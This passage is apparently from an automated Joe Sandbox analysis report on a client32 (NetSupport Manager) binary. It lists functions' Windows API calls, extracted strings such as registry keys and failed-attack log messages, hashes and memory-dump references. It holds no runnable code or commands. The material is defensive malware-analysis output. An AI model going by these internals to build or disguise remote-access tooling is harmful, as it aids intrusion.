                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                              • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                              • API String ID: 2153351953-120756110
                                                                              • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                              • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                              • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                              • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                              Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                              • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                              • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                              • API String ID: 3054845645-718119679
                                                                              • Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                              • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                              • Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                              • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                              Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 110EB5D8
                                                                              • GetTickCount.KERNEL32 ref: 110EB632
                                                                              • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                              • GetTickCount.KERNEL32 ref: 110EB64E
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                              • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                              • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                              • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                              • API String ID: 3451743168-2289091950
                                                                              • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                              • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                              Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                              • _calloc.LIBCMT ref: 1103945C
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                              • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                              • UpdateWindow.USER32(00000000), ref: 11039567
                                                                              • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                              • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                              • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                              • API String ID: 4191401721-1182766118
                                                                              • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                              • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                              • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                              • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                              Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                              • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                              • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                              • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                              • _memset.LIBCMT ref: 110CB51B
                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                              • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                              • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                              • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                              • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                              • API String ID: 2220097787-1587594278
                                                                              • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                              • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                              • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                              • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                              Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000004), ref: 11003691
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                              • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                              • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                              • SelectObject.GDI32(?,?), ref: 110036CC
                                                                              • GetSysColor.USER32(00000010), ref: 110036DC
                                                                              • GetSysColor.USER32(00000010), ref: 110036F3
                                                                              • GetSysColor.USER32(00000014), ref: 1100370A
                                                                              • GetSysColor.USER32(00000014), ref: 11003721
                                                                              • GetSysColor.USER32(00000014), ref: 1100373E
                                                                              • GetSysColor.USER32(00000014), ref: 11003755
                                                                              • GetSysColor.USER32(00000010), ref: 1100376C
                                                                              • GetSysColor.USER32(00000010), ref: 11003783
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                              • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                              • SelectObject.GDI32(?,?), ref: 110037CE
                                                                              • SelectObject.GDI32(?,?), ref: 110037D8
                                                                              • DeleteObject.GDI32(?), ref: 110037DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                              • String ID:
                                                                              • API String ID: 3698065672-0
                                                                              • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                              • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                              • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                              • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                              Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,EE49F673,?,?), ref: 1104B8F6
                                                                              • _sprintf.LIBCMT ref: 1104B923
                                                                                • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                              • _strncpy.LIBCMT ref: 1104BACE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                              • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3341947355-3231647555
                                                                              • Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                              • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                              • Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                              • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                              Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1104702F
                                                                              • wsprintfA.USER32 ref: 110470AE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • wsprintfA.USER32 ref: 110470E9
                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                              • _strrchr.LIBCMT ref: 1104720C
                                                                              • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                              • _free.LIBCMT ref: 11047251
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                              • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                              • API String ID: 1757445300-1785190265
                                                                              • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                              • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                              Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _malloc.LIBCMT ref: 1100B496
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,EE49F673,?,00000000,00000000), ref: 1100AD54
                                                                                • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
